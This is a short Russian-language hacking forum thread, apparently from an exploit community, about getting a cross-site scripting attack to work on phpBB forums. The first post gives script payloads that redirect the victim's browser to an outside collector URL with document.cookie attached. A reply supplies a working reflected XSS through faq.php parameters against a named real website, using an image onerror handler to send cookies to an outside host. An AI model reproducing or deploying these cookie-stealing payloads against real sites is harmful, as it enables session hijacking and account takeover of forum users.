Эксперимент с xss, на форуме phpBB
 

Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;http://www.asd.as/as.php?xack=&quot;+docu...lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&a mp;#61&amp;#34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie &lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?

Я что-то не понял, каким образом ты вставляешь этот скрипт в форум ?

Вот так:
http://www.[target].ty/faq.php....1]=test

Вот так работает
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
http://www.spb-mebel.ru/phpbb/faq.php?faq[0][0]=te):<img src="" sss=http://antichat.ru/cgi-bin/s.jpg? onerror=document.location=this.sss%2Bdocument.cook ie>st&amp;faq[0][1]=test
[/QUOTE]<span id='postcolor'>